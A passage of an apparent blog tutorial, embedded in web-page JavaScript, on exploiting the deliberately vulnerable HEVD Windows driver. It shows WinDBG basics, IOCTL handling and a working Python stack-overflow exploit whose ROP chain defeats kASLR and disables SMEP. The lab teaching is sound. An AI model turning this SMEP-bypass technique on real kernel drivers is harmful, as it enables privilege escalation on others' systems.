PSAPI.EnumDeviceDrivers(base, sizeof(base), byref(c_ulong())):\\n print('Failed to get kernel base address.')\\n sys.exit(1)\\n return base[0]\\n\\n\\nBASE_ADDRESS = get_kernel_base()\\nprint(f'Obtained kernel base address: {hex(BASE_ADDRESS)}')\\n\\nSHELLCODE = (\\n b'\\\\xb8\\\\xef\\\\xbe\\\\xad\\\\xde' + # mov eax,0xdeadbeef\\n b'\\\\xcc' # INT3 -> software breakpoint\\n)\\n\\nRET_PTR = KERNEL32.VirtualAlloc(\\n    c_int(0),                    # lpAddress\\n    c_int(len(SHELLCODE)),       # dwSize\\n    c_int(0x3000),               # flAllocationType = 
MEM_COMMIT | MEM_RESERVE\\n    c_int(0x40)                  # flProtect = PAGE_EXECUTE_READWRITE\\n)\\n\\nKERNEL32.RtlMoveMemory(\\n    c_int(RET_PTR),              # Destination\\n    SHELLCODE,                   # Source\\n    c_int(len(SHELLCODE))        # Length\\n)\\n\\nROP_CHAIN = (\\n    struct.pack('<L', BASE_ADDRESS + 0x0002bbef) +     #  pop eax # ret\\n    struct.pack('<L', 0x42424242) +                    #  Padding for ret 8\\n    struct.pack('<L', 0x42424242) +                    #\\n    struct.pack('<L', 0x000406e9) +                    #  Value to disable SMEP\\n    struct.pack('<L', BASE_ADDRESS + 0x0011f8de) +     #  mov cr4, eax # ret\\n    struct.pack('<L', RET_PTR)                         #  Pointer to shellcode\\n)\\n\\nPAYLOAD = (\\n    b'A' * 2080 +\\n    ROP_CHAIN\\n)\\n\\nSIZE = len(PAYLOAD)\\n\\nHANDLE = DeviceIoControl(DEVICE_NAME)\\nHANDLE.ioctl(IOCTL_HEVD_STACK_OVERFLOW, PAYLOAD, SIZE, 0, 0)\",language:\"Python\"})})}),/*#__PURE__*/e(\"p\",{children:\"Looks good. 
Now check it:\"}),/*#__PURE__*/e(\"img\",{alt:\"Python exploit success\",className:\"framer-image\",height:\"448\",src:\"https://framerusercontent.com/images/0NLOw2Kgih9Eg6Le2KZIEiclxSg.gif\",srcSet:\"https://framerusercontent.com/images/0NLOw2Kgih9Eg6Le2KZIEiclxSg.gif 841w\",style:{aspectRatio:\"841 / 896\"},width:\"420\"}),/*#__PURE__*/t(\"p\",{children:[\"And this is the content of the \",/*#__PURE__*/e(\"code\",{children:\"CR4\"}),\" register:\"]}),/*#__PURE__*/e(\"img\",{alt:\"CR4 register content\",className:\"framer-image\",height:\"106\",src:\"https://framerusercontent.com/images/RhtIeYKFnE8YTyqkuPTdBarZpAg.png\",srcSet:\"https://framerusercontent.com/images/RhtIeYKFnE8YTyqkuPTdBarZpAg.png?scale-down-to=512 512w,https://framerusercontent.com/images/RhtIeYKFnE8YTyqkuPTdBarZpAg.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/RhtIeYKFnE8YTyqkuPTdBarZpAg.png 1920w\",style:{aspectRatio:\"1920 / 212\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"As you can see, we were able to disable \",/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\" and made \",/*#__PURE__*/e(\"code\",{children:\"EAX = 0xdeadbeef\"}),\"!\"]}),/*#__PURE__*/e(\"h2\",{children:\"Conclusions\"}),/*#__PURE__*/t(\"p\",{children:[\"In this post, we were able to execute a shellcode which made \",/*#__PURE__*/e(\"code\",{children:\"EAX = 0xdeadbeef\"}),\". We also bypassed \",/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\" protection using a \",/*#__PURE__*/e(\"code\",{children:\"kROP\"}),\" chain and defeated \",/*#__PURE__*/e(\"code\",{children:\"kASLR\"}),\" by leaking the kernel base address from \",/*#__PURE__*/e(\"code\",{children:\"ring-3\"}),\". 
However, we still have to get a privileged shell on this system, which will be covered in the \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/hevd-privilege-escalation/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"next article\"})}),\".\"]})]});export const richText3=/*#__PURE__*/t(i.Fragment,{children:[/*#__PURE__*/t(\"p\",{children:[\"In the last \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/windows-kernel-debugging/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"post\"})}),\", we were able to set up a lab environment to start exploiting vulnerabilities in the Windows kernel space.\"]}),/*#__PURE__*/t(\"p\",{children:[\"This article will focus on the first steps to exploit the vulnerabilities in HackSys Extreme Vulnerable Driver (\",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\").\"]}),/*#__PURE__*/t(\"p\",{children:[\"First, we need to get familiar with \",/*#__PURE__*/e(\"code\",{children:\"WinDBG\"}),\", a very powerful debugger from Microsoft with a steep learning curve. We\u2019ll also use \",/*#__PURE__*/e(\"code\",{children:\"IDA\"}),\", specifically the freeware version, which is enough for most of what we\u2019re going to face.\"]}),/*#__PURE__*/t(\"p\",{children:[\"In the end, we\u2019re going to be able to crash our Windows 10 OS by leveraging a vulnerability in \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\". 
It's nice \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/red-team-exercise/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"to crash things\"})}),\" for the sake of science.\"]}),/*#__PURE__*/e(\"p\",{children:\"Let\u2019s get our hands dirty!\"})]});export const richText4=/*#__PURE__*/t(i.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"WinDBG 101\"}),/*#__PURE__*/t(\"p\",{children:[\"Before dealing with the exploitation process, I will list some \",/*#__PURE__*/e(\"code\",{children:\"WinDBG\"}),\" commands that have helped me. This is selfishly written as a reference for myself but kindly shared with you.\"]}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"g\"}),\": Short for \",/*#__PURE__*/e(\"code\",{children:\"Go\"}),\". It will resume the execution of the debuggee.\"]})})}),/*#__PURE__*/e(\"img\",{alt:\"g for go\",className:\"framer-image\",height:\"213\",src:\"https://framerusercontent.com/images/oWXReq9V20OxsWHkuDpHW8VWSk.png\",srcSet:\"https://framerusercontent.com/images/oWXReq9V20OxsWHkuDpHW8VWSk.png?scale-down-to=512 512w,https://framerusercontent.com/images/oWXReq9V20OxsWHkuDpHW8VWSk.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/oWXReq9V20OxsWHkuDpHW8VWSk.png 1920w\",style:{aspectRatio:\"1920 / 426\"},width:\"960\"}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"t\"}),\": Short for \",/*#__PURE__*/e(\"code\",{children:\"Step Into\"}),\". It will execute the next instruction. 
If it\u2019s a \",/*#__PURE__*/e(\"code\",{children:\"call\"}),\", it will jump into the call content.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"p\"}),\": Short for \",/*#__PURE__*/e(\"code\",{children:\"Step Over\"}),\". It will execute the next instruction. If it\u2019s a \",/*#__PURE__*/e(\"code\",{children:\"call\"}),\", it will execute whatever the call does and jump over it.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"gu\"}),\": Short for \",/*#__PURE__*/e(\"code\",{children:\"Step Out\"}),\". It will resume the execution until a \",/*#__PURE__*/e(\"code\",{children:\"ret\"}),\" instruction is found. Useful when you \",/*#__PURE__*/e(\"code\",{children:\"Step Into\"}),\" a function and want to return to the place it was called.\"]})})]}),/*#__PURE__*/e(\"img\",{alt:\"t, p, and gu\",className:\"framer-image\",height:\"331\",src:\"https://framerusercontent.com/images/JkAHHX7M1QXNuG4CoGVVBE1yZ2o.png\",srcSet:\"https://framerusercontent.com/images/JkAHHX7M1QXNuG4CoGVVBE1yZ2o.png?scale-down-to=512 512w,https://framerusercontent.com/images/JkAHHX7M1QXNuG4CoGVVBE1yZ2o.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/JkAHHX7M1QXNuG4CoGVVBE1yZ2o.png 1920w\",style:{aspectRatio:\"1920 / 662\"},width:\"960\"}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"d*\"}),\" family: Short for \",/*#__PURE__*/e(\"code\",{children:\"Display Memory\"}),\". It will dump the contents of a given memory address. 
The most useful variation on 32 bits debugging is \",/*#__PURE__*/e(\"code\",{children:\"dc\"}),\" (dump double-word and ASCII chars).\"]})})}),/*#__PURE__*/e(\"img\",{alt:\"dc\",className:\"framer-image\",height:\"373\",src:\"https://framerusercontent.com/images/Mxksc4OGQ66v6jiReqQRFeREa5U.png\",srcSet:\"https://framerusercontent.com/images/Mxksc4OGQ66v6jiReqQRFeREa5U.png?scale-down-to=512 512w,https://framerusercontent.com/images/Mxksc4OGQ66v6jiReqQRFeREa5U.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/Mxksc4OGQ66v6jiReqQRFeREa5U.png 1920w\",style:{aspectRatio:\"1920 / 746\"},width:\"960\"}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"lm\"}),\": Short for \",/*#__PURE__*/e(\"code\",{children:\"List Loaded Modules\"}),\". You can filter the output using \",/*#__PURE__*/e(\"code\",{children:\"lm m <module>\"}),\".\"]})})}),/*#__PURE__*/e(\"img\",{alt:\"lm\",className:\"framer-image\",height:\"456\",src:\"https://framerusercontent.com/images/6HrOfDaC8YcD42CZr6EEXc8NI.png\",srcSet:\"https://framerusercontent.com/images/6HrOfDaC8YcD42CZr6EEXc8NI.png?scale-down-to=512 512w,https://framerusercontent.com/images/6HrOfDaC8YcD42CZr6EEXc8NI.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/6HrOfDaC8YcD42CZr6EEXc8NI.png 1920w\",style:{aspectRatio:\"1920 / 912\"},width:\"960\"}),/*#__PURE__*/e(\"img\",{alt:\"lm m HE*\",className:\"framer-image\",height:\"121\",src:\"https://framerusercontent.com/images/V93a1LEV9rAPPcmbgM46rU6nrc.png\",srcSet:\"https://framerusercontent.com/images/V93a1LEV9rAPPcmbgM46rU6nrc.png?scale-down-to=512 512w,https://framerusercontent.com/images/V93a1LEV9rAPPcmbgM46rU6nrc.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/V93a1LEV9rAPPcmbgM46rU6nrc.png 1920w\",style:{aspectRatio:\"1920 / 
242\"},width:\"960\"}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"dt\"}),\": Short for \",/*#__PURE__*/e(\"code\",{children:\"Display Type\"}),\". It is used to list data structures.\"]})})}),/*#__PURE__*/e(\"img\",{alt:\"dt\",className:\"framer-image\",height:\"460\",src:\"https://framerusercontent.com/images/d5QxxPOYSE5F7MgwS7Lc3kdxuY.png\",srcSet:\"https://framerusercontent.com/images/d5QxxPOYSE5F7MgwS7Lc3kdxuY.png?scale-down-to=512 512w,https://framerusercontent.com/images/d5QxxPOYSE5F7MgwS7Lc3kdxuY.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/d5QxxPOYSE5F7MgwS7Lc3kdxuY.png 1920w\",style:{aspectRatio:\"1920 / 920\"},width:\"960\"}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"r\"}),\": Short for \",/*#__PURE__*/e(\"code\",{children:\"Registers\"}),\". It will show the value of all the processor registers and flags. It\u2019s also used to change the value of a register.\"]})})}),/*#__PURE__*/e(\"img\",{alt:\"r\",className:\"framer-image\",height:\"400\",src:\"https://framerusercontent.com/images/OGcEwPeu4NJkSvdrwh4CL41AWU.png\",srcSet:\"https://framerusercontent.com/images/OGcEwPeu4NJkSvdrwh4CL41AWU.png?scale-down-to=512 512w,https://framerusercontent.com/images/OGcEwPeu4NJkSvdrwh4CL41AWU.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/OGcEwPeu4NJkSvdrwh4CL41AWU.png 1920w\",style:{aspectRatio:\"1920 / 800\"},width:\"960\"}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"u\"}),\": Short for \",/*#__PURE__*/e(\"code\",{children:\"Unassemble\"}),\". 
It will show the instructions at the given memory address.\"]})})}),/*#__PURE__*/e(\"img\",{alt:\"u\",className:\"framer-image\",height:\"367\",src:\"https://framerusercontent.com/images/mVoAF1gzVeibXdklzo6wuf7TaQw.png\",srcSet:\"https://framerusercontent.com/images/mVoAF1gzVeibXdklzo6wuf7TaQw.png?scale-down-to=512 512w,https://framerusercontent.com/images/mVoAF1gzVeibXdklzo6wuf7TaQw.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/mVoAF1gzVeibXdklzo6wuf7TaQw.png 1920w\",style:{aspectRatio:\"1920 / 734\"},width:\"960\"}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"x\"}),\": Short for \",/*#__PURE__*/e(\"code\",{children:\"Examine Symbols\"}),\". It will show the symbols at a given module.\"]})})}),/*#__PURE__*/e(\"img\",{alt:\"x\",className:\"framer-image\",height:\"331\",src:\"https://framerusercontent.com/images/b0F2kwFWNAFGjMKC8pZBFufMqE.png\",srcSet:\"https://framerusercontent.com/images/b0F2kwFWNAFGjMKC8pZBFufMqE.png?scale-down-to=512 512w,https://framerusercontent.com/images/b0F2kwFWNAFGjMKC8pZBFufMqE.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/b0F2kwFWNAFGjMKC8pZBFufMqE.png 1919w\",style:{aspectRatio:\"1919 / 663\"},width:\"959\"}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"e*\"}),\" family: Short for \",/*#__PURE__*/e(\"code\",{children:\"Enter Values\"}),\". It will enter a given value to a specified memory location. 
The most used variation on 32 bits debugging is \",/*#__PURE__*/e(\"code\",{children:\"ed\"}),\" (enter double-word value).\"]})})}),/*#__PURE__*/e(\"img\",{alt:\"ed\",className:\"framer-image\",height:\"229\",src:\"https://framerusercontent.com/images/EMi49Lk6FwZI6PW72egGMrlTJY.png\",srcSet:\"https://framerusercontent.com/images/EMi49Lk6FwZI6PW72egGMrlTJY.png?scale-down-to=512 512w,https://framerusercontent.com/images/EMi49Lk6FwZI6PW72egGMrlTJY.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/EMi49Lk6FwZI6PW72egGMrlTJY.png 1920w\",style:{aspectRatio:\"1920 / 458\"},width:\"960\"}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"?\"}),\": Evaluate expression.\"]})})}),/*#__PURE__*/e(\"img\",{alt:\"?\",className:\"framer-image\",height:\"78\",src:\"https://framerusercontent.com/images/Dnp2Gnq1Ia5OADf4sF37330S0yU.png\",srcSet:\"https://framerusercontent.com/images/Dnp2Gnq1Ia5OADf4sF37330S0yU.png?scale-down-to=512 512w,https://framerusercontent.com/images/Dnp2Gnq1Ia5OADf4sF37330S0yU.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/Dnp2Gnq1Ia5OADf4sF37330S0yU.png 1920w\",style:{aspectRatio:\"1920 / 156\"},width:\"960\"}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"bp\"}),\": Short for \",/*#__PURE__*/e(\"code\",{children:\"Breakpoint\"}),\". It will set a software breakpoint at a given address.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"bl\"}),\": Short for \",/*#__PURE__*/e(\"code\",{children:\"List Breakpoints\"}),\". 
It will list current breakpoints.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"bc\"}),\": Short for \",/*#__PURE__*/e(\"code\",{children:\"Clear Breakpoint\"}),\". It will remove breakpoints.\"]})})]}),/*#__PURE__*/e(\"img\",{alt:\"bp, bl, and bc\",className:\"framer-image\",height:\"379\",src:\"https://framerusercontent.com/images/kBNBGaNSF0SSJqZCCcHBSX4I6Ck.png\",srcSet:\"https://framerusercontent.com/images/kBNBGaNSF0SSJqZCCcHBSX4I6Ck.png?scale-down-to=512 512w,https://framerusercontent.com/images/kBNBGaNSF0SSJqZCCcHBSX4I6Ck.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/kBNBGaNSF0SSJqZCCcHBSX4I6Ck.png 1920w\",style:{aspectRatio:\"1920 / 758\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"This is by no means a comprehensive \",/*#__PURE__*/e(\"code\",{children:\"WinDBG\"}),\" reference, but it shows the commands I use the most when debugging.\"]}),/*#__PURE__*/e(\"h2\",{children:\"Talking to Windows drivers\"}),/*#__PURE__*/e(\"p\",{children:\"The most common goal of Windows Kernel exploitation is to elevate privileges to perform any desired task on the affected computer with the most powerful permissions. We do that by finding a vulnerability in a piece of code running in kernel space and establishing communication between the exploit in user mode and the target in kernel mode, which is where the drivers live.\"}),/*#__PURE__*/t(\"p\",{children:[\"As Windows runs in protected mode, user-land instructions cannot access kernel-space memory. 
However, there is an interface provided by the OS that allows talking to drivers: \",/*#__PURE__*/e(\"code\",{children:\"IOCTL\"}),\" calls.\"]}),/*#__PURE__*/t(\"p\",{children:[\"When a driver is installed, it sets a device name using the \",/*#__PURE__*/e(\"code\",{children:\"IoCreateDevice\"}),\" call.\"]}),/*#__PURE__*/e(\"img\",{alt:\"IoCreateDevice\",className:\"framer-image\",height:\"490\",src:\"https://framerusercontent.com/images/ZYD6cSqCX8pC9BvKtJWQVcYN3U.png\",srcSet:\"https://framerusercontent.com/images/ZYD6cSqCX8pC9BvKtJWQVcYN3U.png?scale-down-to=512 512w,https://framerusercontent.com/images/ZYD6cSqCX8pC9BvKtJWQVcYN3U.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/ZYD6cSqCX8pC9BvKtJWQVcYN3U.png 1920w\",style:{aspectRatio:\"1920 / 980\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"It then defines the routines that it will expose. Commonly, those routines are functions that interact with other layers of the OS (Hardware Abstraction Layer or \",/*#__PURE__*/e(\"code\",{children:\"HAL\"}),\", for example) to manipulate a hardware device. 
In \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\", those routines are functions happening at kernel-level with several vulnerabilities.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Each routine is identified by an \",/*#__PURE__*/e(\"code\",{children:\"IOCTL\"}),\" (I/O control) code.\"]}),/*#__PURE__*/t(\"p\",{children:[\"The driver will accept calls to that routines using \",/*#__PURE__*/e(\"code\",{children:\"IRP\"}),\" (I/O Request Packets) structures and will set a handler that will dispatch the specific routine, given a specific \",/*#__PURE__*/e(\"code\",{children:\"IOCTL\"}),\" code:\"]}),/*#__PURE__*/e(\"img\",{alt:\"IOCTL code\",className:\"framer-image\",height:\"201\",src:\"https://framerusercontent.com/images/ZRfuFFflz43CrQzFjzbRBXSqcs.png\",srcSet:\"https://framerusercontent.com/images/ZRfuFFflz43CrQzFjzbRBXSqcs.png?scale-down-to=512 512w,https://framerusercontent.com/images/ZRfuFFflz43CrQzFjzbRBXSqcs.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/ZRfuFFflz43CrQzFjzbRBXSqcs.png 1920w\",style:{aspectRatio:\"1920 / 402\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"The \",/*#__PURE__*/e(\"code\",{children:\"IrpDeviceIoCtlHandler\"}),\" function in \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\" creates a jump table (like a \",/*#__PURE__*/e(\"code\",{children:\"switch\"}),\" statement) for each managed \",/*#__PURE__*/e(\"code\",{children:\"IOCTL\"}),\" code:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Jump table\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/SdVcuhoLng3SK1M18fIK0Ze7OGI.png\",srcSet:\"https://framerusercontent.com/images/SdVcuhoLng3SK1M18fIK0Ze7OGI.png?scale-down-to=512 512w,https://framerusercontent.com/images/SdVcuhoLng3SK1M18fIK0Ze7OGI.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/SdVcuhoLng3SK1M18fIK0Ze7OGI.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"In \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\", 
each \",/*#__PURE__*/e(\"code\",{children:\"case\"}),\" of that \",/*#__PURE__*/e(\"code\",{children:\"switch\"}),\" statement is handled by another function that will trigger a specific vulnerable function:\"]}),/*#__PURE__*/e(\"img\",{alt:\"vulnerable function\",className:\"framer-image\",height:\"243\",src:\"https://framerusercontent.com/images/SWZ3VBSopQ2buMfSs75KPzm7I.png\",srcSet:\"https://framerusercontent.com/images/SWZ3VBSopQ2buMfSs75KPzm7I.png?scale-down-to=512 512w,https://framerusercontent.com/images/SWZ3VBSopQ2buMfSs75KPzm7I.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/SWZ3VBSopQ2buMfSs75KPzm7I.png 1881w\",style:{aspectRatio:\"1881 / 486\"},width:\"940\"}),/*#__PURE__*/t(\"p\",{children:[\"Now, if we want to talk to that driver, we must get a handle on the driver\u2019s device name, which is \",/*#__PURE__*/e(\"code\",{children:\"HackSysExtremeVulnerableDrive\"}),\" in the case of \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\", and use the \",/*#__PURE__*/e(\"code\",{children:\"DeviceIoControl\"}),\" function to send the \",/*#__PURE__*/e(\"code\",{children:\"IOCTL\"}),\" code we want, along with the payload.\"]}),/*#__PURE__*/t(\"p\",{children:[\"In Python, there\u2019s a third-party package called \",/*#__PURE__*/e(\"code\",{children:\"infi.wioctl\"}),\" that wraps those calls nicely:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"from infi.wioctl import DeviceIoControl\\n\\nHANDLE = DeviceIoControl(DEVICE_NAME)\\nHANDLE.ioctl(IOCTL_CODE, PAYLOAD, SIZE, 0, 0)\",language:\"Python\"})})}),/*#__PURE__*/t(\"p\",{children:[\"With that, we can start looking for our first vulnerability on \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\".\"]}),/*#__PURE__*/e(\"h2\",{children:\"HEVD stack 
overflow\"}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\" has several vulnerabilities built-in. In this post, we will discover the most basic, a stack overflow.\"]}),/*#__PURE__*/t(\"p\",{children:[\"When we look at the jump table generated by the \",/*#__PURE__*/e(\"code\",{children:\"IrpDeviceIoCtlHandler\"}),\" function, the first case is this:\"]}),/*#__PURE__*/e(\"img\",{alt:\"First case\",className:\"framer-image\",height:\"333\",src:\"https://framerusercontent.com/images/42HoaoZo3HeaqMLQTtJChBr7PlA.png\",srcSet:\"https://framerusercontent.com/images/42HoaoZo3HeaqMLQTtJChBr7PlA.png?scale-down-to=512 512w,https://framerusercontent.com/images/42HoaoZo3HeaqMLQTtJChBr7PlA.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/42HoaoZo3HeaqMLQTtJChBr7PlA.png 1920w\",style:{aspectRatio:\"1920 / 666\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"It is triggered when the \",/*#__PURE__*/e(\"code\",{children:\"IOCTL\"}),\" code is \",/*#__PURE__*/e(\"code\",{children:\"2236419\"}),\" decimal or \",/*#__PURE__*/e(\"code\",{children:\"0x222003\"}),\" in hex. Here, a call to \",/*#__PURE__*/e(\"code\",{children:\"BufferOverflowStackIoctlHandler\"}),\" is performed.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Inside \",/*#__PURE__*/e(\"code\",{children:\"BufferOverflowStackIoctlHandler\"}),\", there is a check verifying if the \",/*#__PURE__*/e(\"code\",{children:\"IRP\"}),\" package contains user-supplied data. 
If it does, a call to \",/*#__PURE__*/e(\"code\",{children:\"TriggerBufferOverflowStack\"}),\" is performed:\"]}),/*#__PURE__*/e(\"img\",{alt:\"BufferOverflowStackIoctlHandler\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/K5GueR27WYcnGigvmfFJMcCbo.png\",srcSet:\"https://framerusercontent.com/images/K5GueR27WYcnGigvmfFJMcCbo.png?scale-down-to=512 512w,https://framerusercontent.com/images/K5GueR27WYcnGigvmfFJMcCbo.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/K5GueR27WYcnGigvmfFJMcCbo.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"You can also note that the pointer to the user data is placed on \",/*#__PURE__*/e(\"code\",{children:\"EDX\"}),\" and the pointer to the size of the user data is placed on \",/*#__PURE__*/e(\"code\",{children:\"EAX\"}),\". That information is then pushed to the stack as the parameters for \",/*#__PURE__*/e(\"code\",{children:\"TriggerBufferOverflowStack\"}),\". 
You can see the same in the source code of \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\":\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"NTSTATUS\\nBufferOverflowStackIoctlHandler(\\n _In_ PIRP Irp,\\n _In_ PIO_STACK_LOCATION IrpSp\\n)\\n{\\n SIZE_T Size = 0;\\n PVOID UserBuffer = NULL;\\n NTSTATUS Status = STATUS_UNSUCCESSFUL;\\n\\n UNREFERENCED_PARAMETER(Irp);\\n PAGED_CODE();\\n\\n UserBuffer = IrpSp->Parameters.DeviceIoControl.Type3InputBuffer;\\n Size = IrpSp->Parameters.DeviceIoControl.InputBufferLength;\\n\\n    if (UserBuffer)\\n    {\\n        Status = TriggerBufferOverflowStack(UserBuffer, Size);\\n    }\\n\\n    return Status;\\n}\",language:\"C++\"})})}),/*#__PURE__*/t(\"p\",{children:[\"In the \",/*#__PURE__*/e(\"code\",{children:\"TriggerBufferOverflowStack\"}),\" function, the first important thing to notice is that a \",/*#__PURE__*/e(\"code\",{children:\"memset(&KernelBuffer, 0, 800h)\"}),\" call is done:\"]}),/*#__PURE__*/e(\"img\",{alt:\"TriggerBufferOverflowStack\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/KcXae8mJBeYlDBX3npk5Yk4o4Y.png\",srcSet:\"https://framerusercontent.com/images/KcXae8mJBeYlDBX3npk5Yk4o4Y.png?scale-down-to=512 512w,https://framerusercontent.com/images/KcXae8mJBeYlDBX3npk5Yk4o4Y.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/KcXae8mJBeYlDBX3npk5Yk4o4Y.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"This indicates that the buffer is \",/*#__PURE__*/e(\"code\",{children:\"800h\"}),\" or \",/*#__PURE__*/e(\"code\",{children:\"2048\"}),\" bytes long.\"]}),/*#__PURE__*/t(\"p\",{children:[\"In the end of \",/*#__PURE__*/e(\"code\",{children:\"TriggerBufferOverflowStack\"}),\", a call to 
